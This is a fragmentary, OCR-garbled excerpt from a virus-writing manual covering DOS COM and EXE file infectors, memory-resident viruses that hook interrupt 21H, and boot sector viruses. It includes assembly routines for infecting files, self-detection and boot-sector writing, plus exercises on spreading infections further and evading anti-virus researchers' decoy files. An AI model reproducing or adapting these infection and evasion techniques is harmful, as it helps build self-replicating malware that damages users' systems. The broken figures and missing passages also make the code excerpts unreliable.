Set INF_CNT = 10
Set DEPTH = 1
INFECT_FILES
SEARCH_DIR
No
Infect more DONE
files?
Yes
Find a file
Yes
Yes
DIR? Max depth?
No No
No
COM? CHDIR SUBDIR
Yes
No SEARCH_DIR
FILE_OK?
(Recursive)
Yes
Infect file CHDIR ..
Yes
Infect another?
No
DONE
Figure 5.3: Operation of the search routine.
54 The Giant Black Book of Computer Viruses
push bp ;set up stack frame
sub sp,43H ;subtract size of DTA needed
mov bp,sp
When the virus is new on the system, it will easily find ten files and
the infection process will be fast, but after it has infected almost
everything, it will have to search long and hard before it finds
anything new. Even searching directories two deep from the root is
probably too much, so ways to remedy this potential problem are
discussed in the exercises for this chapter.
good COM files which it could infect because it thinks they have
already been infected. While failure to incorporate such a feature
into FILE_OK will not cause the virus to fail, it will limit its
functionality.
One way to make this test simple and yet very reliable is to
change a couple more bytes than necessary at the beginning of the
host program. The near jump will require three bytes, so we might
take two more, and encode them in a unique way so the virus can
be pretty sure the file is infected if those bytes are properly encoded.
The simplest scheme is to just set them to some fixed value. We’ll
use the two characters “ VI” here. Thus, when a file begins with a
near jump followed by the bytes “ V”=56H and “ I” =49H, we can
be almost positive that the virus is there, and otherwise it is not.
Granted, once in a great while the virus will discover a COM file
which is set up with a jump followed by “ VI” even though it hasn’t
been infected. The chances of this occurring are so small, though,
that it will be no great loss if the virus fails to infect this rare one
file in a million. It will infect everything else.
Next, Timid-II must be careful not to infect a file that is too big.
If the file is too big, adding the virus to it could make it crash. But
how big is too big? Too big is when Timid-II doesn’t have enough
room for its stack. Although the virus doesn’t use too much stack,
one must remember that hardware interrupts can also use the stack
at any time. Leaving 100H bytes for stack ought to be enough. Thus,
Timid should only infect hosts such that
The size of the host can be conveniently found in the file search
data at DTA+1AH, and compared with this value.
One final check is necessary. Starting with DOS 6.0, a COM
program may not really be a COM program. DOS checks the
program to see if it has a valid EXE header, even if it is named
“ COM” , and if it has an EXE header, DOS loads it as an EXE file.
This unusual circumstance can cause problems if a parasitic virus
doesn’t recognize the same files as EXE’s and steer clear of them.
If a parasitic COM infector attacked a file with an EXE structure,
DOS would no longer recognize it as an EXE program, so DOS
would load it as a COM program. The virus would execute properly,
but then it would attempt to transfer control to an EXE header
A Parasitic COM Infector 57
and exits with c set if this instruction sets the z flag. Finally,
FILE_OK will close the file if it isn’t a good one to infect, and leave
it open, with the handle in bx, if it can be infected. It’s left open so
the infected version can easily be written back to the file.
With the file pointer in the right location, the virus can now write
itself out to disk at the end of this file. To do so, one simply uses
the DOS write function, 40 Hex. To use Function 40H one must set
ds:dx to the location in memory where the data is stored that is
going to be written to disk. In this case that is the start of the virus.
58 The Giant Black Book of Computer Viruses
In Memory On Disk
START_IMAGE
START_CODE
START_CODE
Virus
Virus Host 2
Host 1
A Parasitic COM Infector 59
Next, the virus writes the five bytes at START_IMAGE out to the
file (notice the indexed addressing, since START_IMAGE moves
around from infection to infection):
mov cx,5
lea dx,[di + OFFSET START_IMAGE]
mov ah,40H
int 21H
The final step in infecting a file is to set up the first five bytes
of the file with a jump to the beginning of the virus code, along with
the identification letters “ VI” . To do this, the virus positions the
file pointer to the beginning of the file:
xor cx,cx
mov dx,cx
mov ax,4200H
int 21H
The next two bytes should be a word to tell the CPU how many
bytes to jump forward. This byte needs to be the original file size
of the host program, plus the number of bytes in the virus which
are before the start of the executable code (we will put some data
60 The Giant Black Book of Computer Viruses
Finally, the virus sets up the identification bytes “ VI” in the five
byte data area,
mov WORD PTR [di+START_IMAGE+3],4956H ;’VI’
and writes the data to the start of the file, using the DOS write
function,
mov cx,5
lea dx,[di+OFFSET START_IMAGE]
mov ah,40H
int 21H
Exercises
1. The Timid-II virus can take a long time to search for files to infect if
there are lots of directories and files on a large hard disk. Add code to
limit the search to at most 500 files. How does this cut down on the
maximum time required to search?
2. The problem with the virus in Exercise 1 is that it won’t be very efficient
about infecting the entire disk when there are lots more than 500 files.
The first 500 files which it can find from the root directory will be
infected if they can be (and many of those won’t even be COM files)
but others will never get touched. To remedy this, put in an element of
chance by using a random number to determine whether any given
subdirectory you find will be searched or not. For example, you might
use the low byte of the time at 0:46C, and if it’s an even multiple of 10,
search that subdirectory. If not, leave the directory alone. That way, any
subdirectory will only have a 1 in 10 chance of being searched. This
will greatly extend the range of the search without making any given
search take too long.
3. Timid-II doesn’t actually have to add the letters “ VI” after the near
jump at the beginning to tell it is there. It could instead examine the
distance of the jump in the second and third bytes of the file. Although
this distance changes with each new infection, the distance between the
point jumped to and the end of the file is always fixed, because the virus
is a fixed length. Rewrite Timid-II so that it determines whether a file
is infected by testing this distance, and get rid of the “ VI” after the
jump.
4. Design a virus that inserts itself before the host in a file. Hint: You won’t
need indirect addressing, which makes the virus somewhat simpler. The
main obstacles you’ll have to face are moving the host down to offset
100H and executing it after the virus is done, and building a copy of the
virus on disk with a new host attached to it.
62 The Giant Black Book of Computer Viruses
Chapter 6
A Memory
Resident Virus
Source Code for this Chapter: \SEQUIN\SEQUIN.ASM
SEQUIN + HOST
loaded from disk
SEQUIN
SEQUIN
loads into
SEQUIN in memory the IVT
infects new hosts
IVT
0000:0000
ball programs.1 Thus, a virus can simply locate its code in this space
and chances are it won’t foul anything up. To go resident, the virus
simply checks to see if it is already there by calling the IN_MEM-
ORY routine—a simple 10 byte compare function. IN_MEMORY
can be very simple, because the location of Sequin in memory is
always fixed. Thus, all it has to do is look at that location and see
if it is the same as the copy of Sequin which was just loaded attached
to a host:
IN_MEMORY:
xor ax,ax ;set es segment = 0
mov es,ax
mov di,OFFSET INT_21 + IVOFS ;di points to virus start
mov bp,sp ;get absolute return @
mov si,[bp] ;to si
mov bp,si ;save it in bp too
add si,OFFSET INT_21 - 103H ;point to int 21H handler
mov cx,10 ;compare 10 bytes
1 See Ralf Brown & Jim Kyle, Uninterrupted Interrupts (Addison-Wesley, 1995).
66 The Giant Black Book of Computer Viruses
repz cmpsb
ret
Notice how the call to this routine is used to locate the virus in
memory. (Remember, the virus changes offsets since it sits at the
end of the host.) When IN_MEMORY is called, the absolute return
address (103H in the original assembly) is stored on the stack. The
code setting up bp here just gets the absolute start of the virus.
If the virus isn’t in memory already, IN_MEMORY returns with
the z flag reset, and Sequin just copies itself into memory at 0:200H,
mov di,200H
mov si,100H
mov cx,OFFSET END_Sequin - 100H
rep movsb
Hooking Interrupts
Of course, if Sequin just copied some code to a different
location in memory, and then passed control to the host, it could
not be a virus. The code it leaves in memory must do something—
and to do something it must execute at some point in time.
In order to gain control of the processor in the future, all
memory resident programs—viruses or not—hook interrupts. Let
us examine the process of how an interrupt works to better under-
stand this process. There are two types of interrupts: hardware
interrupts and software interrupts, and they work differently. A
virus can hook either type of interrupt, but the usual approach is to
hook software interrupts.
A hardware interrupt is normally invoked by something in
hardware. For example, when you press a key on the keyboard it is
sent to the computer where an 8042 microcontroller does some data
massaging, and then signals the 8259 interrupt controller chip that
it has a keystroke. The 8259 generates a hardware interrupt signal
for the 80x86. The 80x86 calls an Interrupt Service Routine which
retrieves the keystroke from the 8042 and puts it in main system
memory.
In contrast, a software interrupt is called using an instruction
in software which we’ve already seen quite a bit: int XX, where XX
can be any number from 0 to 0FFH. Let’s consider int 21H: When
the processor encounters the int 21H instruction, it pushes (a) the
flags (carry, zero, etc.), (b) the cs register and (c) the offset imme-
A Memory-Resident Virus 67
diately following the int 21H instruction. Next, the processor jumps
to the address stored in the 21H vector in the Interrupt Vector Table.
This vector is stored at segment 0, offset 21H x 4 = 84H. An
interrupt vector is just a segment and offset which points some-
where in memory. For this process to do something valuable, a
routine to make sense out of the interrupt call must be sitting at this
“ somewhere in memory” .2 This routine then executes, and passes
control back to the next instruction in memory after the int 21H
using the iret (interrupt return) instruction. Essentially, a software
interrupt is very similar to a far call which calls a subroutine at a
different segment and offset. It differs in that it pushes the flags
onto the stack, and it requires only two bytes of machine language
instead of five. Generally speaking, interrupts invoke system-wide
functions, whereas a far call is used to invoke a program-specific
function (though that is not always the case).
Software interrupts are used for many important system serv-
ices, as we’ve already learned in previous chapters. Therefore they
are continually being called by all kinds of programs and by DOS
itself. Thus, if a virus can subvert an interrupt that is called often,
it can filter calls to it and add unsuspected “ features” .
The Sequin virus subverts the DOS Interrupt 21H handler,
effectively filtering every call to DOS after the virus has been
loaded. Hooking an interrupt vector in this manner is fairly simple.
Sequin contains an interrupt 21H handler which is of the form
INT_21:
.
.
.
jmp DWORD PTR cs:[OLD_21]
OLD_21 DD ?
2 This much is the same for both hardware and software interrupts.
68 The Giant Black Book of Computer Viruses
If there were no code before the jump above, this interrupt hook
would do nothing and nothing would change in how interrupt 21H
worked. The code before the jump instruction, however, can do
whatever it pleases, but if it doesn’t act properly, it could foul up
the int 21H instruction which was originally executed, so that it
won’t accomplish what it was intended to do. Normally, that means
the hook should preserve all registers, and it should not leave new
files open, etc.
Typically, a resident virus will hook just one function for int
21H. In theory, any function could be hooked, but some make the
virus’ job especially easy—particularly those file functions for
which one of the parameters passed to DOS is a file name. Sequin
hooks Function 3DH, the File Open function:
INT_21:
cmp ah,3DH ;file open?
je INFECT_FILE ;yes, infect if possible
jmp DWORD PTR cs:[OLD_21]
and then writes the mov ah,37H and a jump to the beginning of the
file. This completes the infection process.
This entire process takes place inside the viral int 21H handler
before DOS even gets control to open the file in the usual manner.
After it’s infected, the virus hands control over to DOS, and DOS
opens an infected file. In this way the virus just sits there in memory
infecting every COM file that is opened by any program for any
reason.
Note that the Interrupt 21H handler can’t call Interrupt 21H to
open the file to check it, because it would become infinitely
recursive. Thus, it must fake the interrupt by using a far call to the
old interrupt 21H vector:
pushf ;push flags to simulate int
call DWORD PTR [OLD_21]
Testing Sequin
To test Sequin, execute the program Sequin.COM, loading the
virus into memory. Then use XCOPY to copy any dummy COM
file to another name. Notice how the size of the file you copied
changes. Both the source file and the destination file will be larger,
because Sequin infected the file before DOS even got a hold of it.
Sequin exhibits some interesting behavior in a Windows 95
DOS window. If you load it, it seems to be there, but it doesn’t
infect anything. That’s because Windows 95 doesn’t execute the
code for Interrupt 21H when int 21H is executed. Instead, it uses a
protected mode handler you never see. However if you use the
TESTSEQ program on the disk with DEBUG, and trace execution
it will use the DOS code and infect! Yet other programs actually
seem to cause the Interrupt 21H handler to execute.
Exercises
1. Modify Sequin to infect a file when the DOS EXEC function (4BH) is
used on it, instead of the file open function. This will make the virus
infect programs when they are run.
3. A virus could hide in some of the unused RAM between 640K and 1
megabyte. Develop a strategy to find memory in this region that is
unused, and modify Sequin to go into memory there.
4. Using Debug, can you find any places in memory in the first 64K that
don’t appear to be used for anything? (Hint: Change a few bytes and
see if anything goes wrong. Watch to see if your changes stay put or if
they’re modified by some other program?) Can you write a virus to hide
there?
Chapter 7
Infecting EXE Files
Source Code for this Chapter: \INTR-B\INTR-B.ASM
From this, one can infer that the start of the second segment is
6200H (= 620H x 10H) bytes from the start of the load module. The
Relocation Pointer Table would contain a vector 0000:0153 to point
to the segment reference (20 06) of this far call. When DOS loads
the program, it might load it starting at segment 2130H, because
DOS and some memory resident programs occupy locations below
this. So DOS would first load the Load Module into memory at
2130:0000. Then it would take the relocation pointer 0000:0153
and transform it into a pointer, 2130:0153 which points to the
segment in the far call in memory. DOS will then add 2130H to the
word in that location, resulting in the machine language code 9A
80 09 50 27, or call far 2750:0980 (See Figure 7.2).
Note that a COM program requires none of these calisthenics
since it contains no segment references. Thus, DOS just has to set
the segment registers all to one value before passing control to the
program.
Infecting EXE Files 73
was initialized with, the stack could end up right in the middle of
the virus code with the right host. (That memory would have been
free space before the virus had infected the program.) As soon as
the virus started making calls or pushing data onto the stack, it
would corrupt its own code and self-destruct.
To set up segments for the virus, new initial segment values for
cs and ss must be placed in the EXE file header. Also, the old initial
segments must be stored somewhere in the virus, so it can pass
control back to the host program when it is finished executing. We
will have to put two pointers to these segment references in the
relocation pointer table, since they are relocatable references inside
the virus code segment.
Adding pointers to the relocation pointer table brings up an
important question. To add pointers to the relocation pointer table,
it could be necessary to expand that table’s size. Since the EXE
Header must be a multiple of 16 bytes in size, relocation pointers
are allocated in blocks of four four byte pointers. Thus, with two
segment references, it would be necessary to expand the header
only every other time, on the average. Alternatively, a virus could
choose not to infect a file, rather than expanding the header. There
are pros and cons for both possibilities. A load module can be
hundreds of kilobytes long, and moving it is a time consuming chore
that can make it very obvious that something is going on that
Start of File
EXE Header
Load Module
76 The Giant Black Book of Computer Viruses
IN RAM
2750:0980 Routine X
Executable
Machine
DOS Code
2130:0000
PSP
ON DISK
0620:0980 Routine X
Load
Module
EXE Header
shouldn’t be. On the other hand, if the virus chooses not to move
the load module, then roughly half of all EXE files will be naturally
immune to infection. The Intruder-B virus takes the quiet and
cautious approach that does not infect every EXE.
Suppose the main virus routine looks something like this:
VSEG SEGMENT
VIRUS:
mov ax,cs ;set ds=cs for virus
mov ds,ax
.
.
.
cli
mov ss,cs:[HOSTS]
mov sp,cs:[HOSTS+2]
sti
jmp DWORD PTR cs:[HOSTC]
HOSTS DW ?,?
HOSTC DW ?,?
Then, to infect a new file, the copy routine must perform the
following steps:
9. Recalculate the size of the infected EXE file, and adjust the header
fields Page Count and Last Page Size accordingly.
10. Write the new EXE Header back out to disk.
All the initial segment values must be calculated from the size
of the load module which is being infected. The code to accomplish
this infection is in the routine INFECT.
1. The file must really be an EXE file—it must start with “ MZ” .
2. The Overlay Number must be zero. Intruder-B doesn’t want to
infect overlays because the program calling them may have very
specific expectations about what they contain, and an infection
could foul things up rather badly.
3. The host must have enough room in its relocation pointer table
for two more pointers. This is determined by a simple calculation
from values stored in the EXE header. If
16*Header Paragraphs-4*Relocation Table Entries-Relocation Table Offset
chances of it are fairly slim. (If Initial ip was zero for Intruder-B,
that would not be the case—that’s why the data area comes first.)
Exercises
1. Modify the Intruder-B to add relocation table pointers to the host when
necessary. To avoid taking too long to infect a large file, you may want
to only add pointers for files up to some fixed size.
2. Modify Intruder-B so it will only infect host programs that have at least
3 segments and 25 relocation vectors. This causes the virus to avoid
simple EXE programs that are commonly used as decoy files to catch
viruses when anti-virus types are studying them.
3. Write a virus that infects COM files by turning them into EXE files
where the host occupies one segment and the virus occupies another
segment.
80 The Giant Black Book of Computer Viruses
Chapter 8
An Advanced
Resident Virus
Source Code for this Chapter: \YELLOW\YELLOW.ASM
So far the viruses we’ve discussed have been fairly tame. Now
we are ready to study a virus that I’d call moderately infective. The
Yellow Worm virus, which is the subject of this chapter, combines
the techniques of infecting EXE files with memory residence. It is
a virus that can infect most of the files in your computer in a few
hours of normal use. In other words, be careful with it or you will
find it an unwelcome guest in your computer.
and, from there, walk the MCB chain. To walk the MCB chain, one
takes the first MCB segment and adds BLK_SIZE, the size of the
memory block to it (this is stored in the MCB). The new segment
will coincide with the start of a new MCB. This process is repeated
until one encounters a Z-block, which is the last in the chain. Code
to walk the chain looks like this:
mov es,ax ;set es=MCB segment
NEXT: cmp BYTE PTR es:[bx],’Z’ ;is it the Z block?
1 Andrew Schulman, et. al., Undocumented DOS, (Addison Wesley, New York:1991)
p. 518. Some documentation on the List of Lists is included in this book in Appendix
A where DOS Function 52H is discussed.
An Advanced Resident Virus 83
Offset Size Description
5 3 Reserved
Worm does is ok: (1) When the Z block is controlled by the program
which the Yellow Worm is part of (e.g. the Owner = current PSP),
or (2) When the Z block is free (Owner = 0). If something else
controls the Z block (a highly unlikely event), the Yellow Worm is
polite and does not attempt to go resident.
Once the Yellow Worm has made room for itself in memory,
it copies itself to the Z Memory Control Block using the segment
of the MCB + 1 as the operating segment. Since the Worm starts
executing at offset 0 from the host, it can just put itself at the same
offset in this new segment. That way it avoids having to deal with
relocating offsets.
Finally, the Yellow Worm installs an interrupt hook for Inter-
rupt 21H, which activates the copy of itself in the Z MCB. That
makes the virus active. Then the copy of the Yellow Worm in
memory passes control back to the host.
Free Free
Memory Memory
Z-Block M-Block
Virus
Host Host
DOS DOS
this function gets called and the virus jumps into action. As such,
files get infected as a user uses his computer. Before long, every
program he normally runs becomes infected.
When the EXEC function is trapped by the virus in its interrupt
21H hook, it first infects the file, and then passes control to the
original DOS interrupt 21H handler with a jump instruction:
jmp DWORD PTR cs:[OLD_21H]
Infecting Programs
The infection process which the Yellow Worm uses is virtually
identical to Intruder-B, except it needn’t mess with the relocation
Pointer Table. Specifically, the virus must
Self-Detection in Memory
The Yellow Worm is automatically self-detecting. It doesn’t
need to do anything to determine whether it’s already in memory
An Advanced Resident Virus 87
Windows Compatibility
Making a small Z block of memory at the end of DOS memory
is not a normal way for a program to go resident, so one might
suspect that it could foul up advanced programs like Windows,
which completely take over the computer and go into protected
mode. Such is exactly the case for Windows 3.1. WIN.COM will
start to executed, but then inexplicably bomb out without giving the
user the least clue as to why. The Windows development team at
Microsoft became aware of this problem with the Yellow Worm
and graciously fixed Windows 95 so that the Worm will live right
through the Windows 95 startup and be alive and active in every
DOS box started up under Windows 95. Alternatively, if the Yellow
Worm is originally loaded in memory in a DOS box, it will be active
just in that box, and no others. When that DOS box is closed, the
worm will disappear and go away.
Windows 95 causes the Yellow Worm to behave in other
interesting ways as well. That’s because Windows doesn’t always
use the DOS Interrupt 21H, Function 4BH to execute a file. If
Windows has an exact path for the file, either because that path was
fully specified (e.g. “ c:\dos\xcopy” ) or because the program re-
sides in the currently logged directory, then Windows will execute
the program directly without ever calling the DOS EXEC. Because
of this, the Yellow Worm will not infect programs loaded in this
fashion. If, however, the “ path” list in the AUTOEXEC.BAT file
must be searched to find the executable, Windows gives control to
DOS, which uses the EXEC call.
This quirky behavior can actually be a benefit for the virus.
Generally, any virus that doesn’t infect files in a straight-forward
way can often evade falling into the grip of anti-virus programs.
Typically, when an anti-virus developer gets hold of a suspected
virus, he will put it in a directory with a few other dummy host
88 The Giant Black Book of Computer Viruses
2 We’ve changed this feature in this edition of the book because Windows 95 behaves
differently.
An Advanced Resident Virus 89
Exercises
1. Modify the Yellow Worm so it won’t load if some version of Windows
isn’t running. To do this, you call Interrupt 2FH with ax set to 1600H.
If Windows is installed, this will return with al=major version number
and ah=minor version number (e.g. 3, 1 for Windows 3.1 or 4, 0 for
Windows 95). If Windows isn’t there, it will return with al=0. This
dumb little trick is quite valuable to incorporate into any DOS-based
virus now a days. When an anti-virus developer tries your virus and it
doesn’t go resident in DOS, he won’t bother with detecting it. Yet most
DOS programs are run under Windows now. That keeps your virus
undetected much longer than it would be if it worked without Windows,
without sacrificing much in its ability to infect new programs.
2. Write a virus which installs itself using the usual DOS Interrupt 21H,
Function 31H Terminate and Stay Resident call. The main problems
you must face are (a) self-detection and (b) executing the host. If the
virus detects itself in memory, it can just allow the host to run, but if it
does a TSR call, it must reload the host so that it gets relocated by DOS
into a location in memory where it can execute freely.
3. Write a virus which breaks up the current memory block, places itself
in the lower block where it goes resident, and it executes the host in the
higher block. Essentially, this virus will do just what the virus in
exercise 2 did, without calling DOS.
Chapter 9
An Introduction
to Boot Sector
Viruses
Source Code for this Chapter: \KILROY\BOOT.ASM
\KILROY\TRIVBOOT.ASM
\KILROY\KILROY.ASM
The boot sector virus can be the simplest or the most sophisti-
cated of all computer viruses. On the one hand, the boot sector is
always located in a very specific place on disk. Therefore, both the
search and copy mechanisms can be extremely quick and simple,
if the virus can be contained wholly within the boot sector. On the
other hand, since the boot sector is the first code to gain control
after the ROM startup code, it is very difficult to stop before it loads.
If one writes a boot sector virus with sufficiently sophisticated
anti-detection routines, it can also be very difficult to detect after it
loads, making the virus nearly invincible.
In the next three chapters we will examine several different
boot sector viruses. This chapter will take a look at two of the
simplest boot sector viruses just to introduce you to the boot sector.
The following chapters will dig into the details of two models for
boot sector viruses which have proven extremely successful in the
wild.
92 The Giant Black Book of Computer Viruses
Boot Sectors
To understand the operation of a boot sector virus one must
first understand how a normal, uninfected boot sector works. Since
the operation of a boot sector is hidden from the eyes of a casual
user, and often ignored by books on PC’s, we will discuss them
here.
When a PC is first turned on, the CPU begins executing the
machine language code at the location F000:FFF0. The system
BIOS ROM (Basic-Input-Output-System Read-Only-Memory) is
located in this high memory area, so it is the first code to be executed
by the computer. This ROM code is written in assembly language
and stored on chips (EPROMS) inside the computer. Typically this
code will perform several functions necessary to get the computer
up and running properly. First, it will check the hardware to see
what kinds of devices are a part of the computer (e.g., color or mono
monitor, number and type of disk drives) and it will see whether
these devices are working correctly. The most familiar part of this
startup code is the memory test, which cycles through all the
memory in the machine, displaying the addresses on the screen. The
startup code will also set up an interrupt table in the lowest 1024
bytes of memory. This table provides essential entry points (inter-
rupt vectors) so all programs loaded later can access the BIOS
services. The BIOS startup code also initializes a data area for the
BIOS starting at the memory location 0040:0000H, right above the
interrupt vector table. Once these various housekeeping chores are
done, the BIOS is ready to transfer control to the operating system
for the computer, which is stored on disk.
But which disk? Where on that disk? What does it look like?
How big is it? How should it be loaded and executed? If the BIOS
knew the answers to all of these questions, it would have to be
configured for one and only one operating system. That would be
a problem. As soon as a new operating system (like OS/2) or a new
version of an old familiar (like MS-DOS 6.22) came out, your
computer would become obsolete! For example, a computer set up
with PC-DOS 5.0 could not run MS-DOS 3.3, 6.2, or Linux. A
machine set up with CPM-86 (an old, obsolete operating system)
could run none of the above. That wouldn’t be a very pretty picture.
The boot sector provides a valuable intermediate step in the
process of loading the operating system. It works like this: the BIOS
An Introduction to Boot Sector Viruses 93
on. Next it checks to see if the two hidden operating system files
are on the disk. If they aren’t, the boot sector displays an error
message and stops the machine. If they are there, the boot sector
tries to load the IBMBIO.COM or IO.SYS file into memory at
location 0000:0700H. If successful, it then passes control to that
program file, which continues the process of loading the PC/MS-
DOS operating system. That’s all the boot sector on a floppy disk
does.
The boot sector also can contain critical information for the
operating system. In most DOS-based systems, the boot sector will
contain information about the number of tracks, heads, sectors, etc.,
on the disk; it will tell how big the FAT tables are, etc. Although
the information contained here is fairly standardized (see Table
9.1), not every version of the operating system uses all of this data
in the same way. In particular, DR-DOS is noticeably different.
A boot sector virus can be fairly simple—at least in principle.
All that such a virus must do is take over the first sector on the disk.
From there, it tries to find uninfected disks in the system. Problems
arise when that virus becomes so complicated that it takes up too
much room. Then the virus must become two or more sectors long,
and the author must find a place to hide multiple sectors, load them,
and copy them. This can be a messy and difficult job. However, it
is not too difficult to design a virus that takes up only a single sector.
This chapter and the next will deal with such viruses.
Rather than designing a virus that will infect a boot sector, it is
much easier to design a virus that simply is a self-reproducing boot
sector. Before we do that, though, let’s design a normal boot sector
that can load DOS and run it. By doing that, we’ll learn just what
a boot sector does. That will make it easier to see what a virus has
to work around so as not to cause problems.
standard data for the start of the boot sector is described in Table
9.1. It consists of a total of 59 bytes of information, the last 24
having been added for DOS 6. Most of this information is required
in order for DOS and the BIOS to use the disk drive and it should
never be changed inadvertently. The exceptions are the DOS_ID
and the DISK_LABEL fields. They are simply names to identify
the boot sector and the disk, and can be anything you like.
Right after the jump instruction, the boot sector sets up the
stack. Next, it sets up the Disk Parameter Table also known as the
Disk Base Table. This is just a table of parameters which the BIOS
uses to control the disk drive (Table 9.2) through the disk drive
controller (a chip on the controller card). More information on these
parameters can be found in Peter Norton’s Programmer’s Guide to
the IBM PC, and similar books. When the boot sector is loaded, the
BIOS has already set up a default table, and put a pointer to it at the
address 0000:0078H (Interrupt 1E Hex). The boot sector replaces
this table with its own, tailored for the particular disk. This is
standard practice, although in many cases the BIOS table is per-
fectly adequate to access the disk.
96 The Giant Black Book of Computer Viruses
Offset Description
names stored in the boot record. Typical code for this whole
operation looks like this:
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
Once the boot sector has verified that the system files are on
disk, it tries to load the first file. It assumes that the first file is
located at the very start of the data area on disk, in one contiguous
block. So to load it, the boot sector calculates where the start of the
data area is,
First Data Sector = FRDS
+ [(32*ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZE
and the size of the file in sectors. The file size in bytes is stored at
offset 1CH from the start of the directory entry at 0000:0500H. The
number of sectors to load is
SIZE IN SECTORS = (SIZE_IN_BYTES/SEC_SIZE) + 1
The file is loaded at 0000:0700H. Then the boot sector sets up some
parameters for that system file in its registers, and transfers control
to it. From there the operating system takes over the computer, and
eventually the boot sector’s image in memory is overwritten by
other programs.
98 The Giant Black Book of Computer Viruses
Note that the size of this file cannot exceed 7C00H - 0700H,
plus a little less to leave room for the stack. That’s about 29
kilobytes. If it’s bigger than that, it will run into the boot sector in
memory. Since that code is executing when the system file is being
loaded, overwriting it will crash the system. Now, if you look at the
size of IO.SYS in MS-DOS 6.2, you’ll find it’s over 40K long!
How, then, can the boot sector load it? One of the dirty little secrets
of DOS 5.0 and 6.X is that the boot sector does not load the entire
file! It just loads what’s needed for startup and then lets the system
file itself load the rest as needed.
Interrupt 13H
Since the boot sector is loaded and executed before DOS, none
of the usual DOS interrupt services are available to it. It cannot
simply call INT 21H to do file access, etc. Instead it must rely on
the services that the BIOS provides, which are set up by the ROM
startup routine. The most important of these services is Interrupt
13H, which allows programs access to the disk drives.
Interrupt 13H offers two services we will be interested in, and
they are accessed in about the same way. The Disk Read service is
specified by setting ah=2 when int 13H is called, and the Disk Write
service is specified by setting ah=3.
On a floppy disk or a hard disk, data is located by specifying
the Track (or Cylinder), the Head, and the Sector number of the
data. (See Figure 9.1). On floppy disks, the Track is a number from
0 to 39 or from 0 to 79, depending on the type of disk, and the Head
corresponds to which side of the floppy is to be used, either 0 or 1.
On hard disks, Cylinder numbers can run into the hundreds or
thousands, and the number of Heads is simply twice the number of
physical platters used in the disk drive. Sectors are chunks of data,
usually 512 bytes for PCs, that are stored on the disk. Typically
anywhere from 9 to 64 sectors can be stored on one track/head
combination.
To read sectors from a disk, or write them to a disk, one must
pass Interrupt 13H several parameters. First, one must set al equal
to the number of sectors to be read or written. Next, dl must be the
drive number (0=A:, 1=B:, 80H=C:, 81H=D:) to be read from. The
dh register is used to specify the head number, while cl contains
the sector, and ch contains the track number. In the event there are
An Introduction to Boot Sector Viruses 99
r3
r6
ct o
cto
Se
Se
S e ctor
r8
S e cto
1
Se Tra
Tra c k 5 4
ct
Tra c k 4 or
or ct
5 Tra c k 3 Se
Tra c k 2
Tra ck 1
ck 0
S e ctor 0
Head 0
Head 1 (Other Side)
100 The Giant Black Book of Computer Viruses
more than 256 tracks on the disk, the track number is broken down
into two parts, and the lower 8 bits are put in ch, and the upper two
bits are put in the high two bits of cl. This makes it possible to handle
up to 64 sectors and 1024 cylinders on a hard disk. Finally, one
must use es:bx to specify the memory address of a buffer that will
receive data on a read, or supply data for a write. Thus, for example,
to read Cylinder 0, Head 0, Sector 1 on the A: floppy disk into a
buffer at ds:200H, one would code a call to int 13H as follows:
mov ax,201H ;read 1 sector
mov cx,1 ;Head 0, Sector 1
mov dx,0 ;Drive 0, Track 0
mov bx,200H ;buffer at offset 200H
push ds
pop es ;es=ds
int 13H
When Interrupt 13H returns, it uses the carry flag to specify whether
it worked or not. If the carry flag is set on return, something caused
the interrupt service routine to fail.
file and it’s not there, displaying an error message. The result is
practically the same. Trimming the boot sector in this fashion
makes it necessary to search for only one file instead of two, and
saves about 30 bytes.
Finally, the BASIC.ASM program contains an important
mechanism that boot sector viruses need, even though it isn’t a
virus: a loader. A boot sector isn’t an ordinary program that you
can just load and run like an EXE or a COM file. Instead, it has to
be placed in the proper place on the disk (Track 0, Head 0, Sector
1) in order to be useful. Yet when you assemble an ASM file, you
normally create either a COM or an EXE file. The loader bridges
this gap.
To make BASIC.ASM work, it should be assembled into a
COM file. The boot sector itself is located at offset 7C00H in this
COM file. That is done by simply placing an
ORG 7C00H
instruction before the boot sector code. At the start of the COM file,
at the usual offset 100H, is located a small program which
1) Reads the boot sector from the disk in the A: drive into a data
area,
2) Copies the disk-specific data at the start of the boot sector into
the BASIC boot sector, and
3) Writes the resulting sector back out to the disk in drive A.
;This segment is where the first operating system file (IO.SYS) will be
;loaded and executed from. We don’t know (or care) what is there, as long as
;it will execute at 0070:0000H, but we do need the address to jump to defined
;in a separate segment so we can execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
DOS_LOAD ENDS
;This is the loader for the boot sector. It writes the boot sector to
;the A: drive in the right place, after it has set up the basic disk
;parameters. The loader is what gets executed when this program is executed
;from DOS as a COM file.
ORG 100H
LOADER:
mov ax,201H ;load the existing boot sector
mov bx,OFFSET DISK_BUF ;into this buffer
mov cx,1 ;Drive 0, Track 0, Head 0, Sector 1
mov dx,0
int 13H
mov ax,201H ;try twice to compensate for disk
int 13H ;change errors
;This area is reserved for loading the boot sector from the disk which is going
;to be modified by the loader, as well as the first sector of the root dir,
;when checking for the existence of system files and loading the first system
;file. The location is fixed because this area is free at the time of the
;execution of the boot sector.
ORG 0500H
;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a floppy disk.
ORG 7C00H
;Here we look at the first file on the disk to see if it is the first MS-DOS
;system file, IO.SYS.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;mult by secs per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX ;start of root dir in ax
MOV BP,AX ;save it here
ORG 7DFEH
MAIN ENDS
END LOADER
ORG 100H
ORG 7C00H
An Introduction to Boot Sector Viruses 105
TRIV_BOOT:
mov ax,0301H ;write one sector
mov bx,7C00H ;from here
mov cx,1 ;to Track 0, Sector 1, Head 0
mov dx,1 ;on the B: drive
int 13H ;do it
mov ax,0301H ;do it again to make sure it works
int 13H
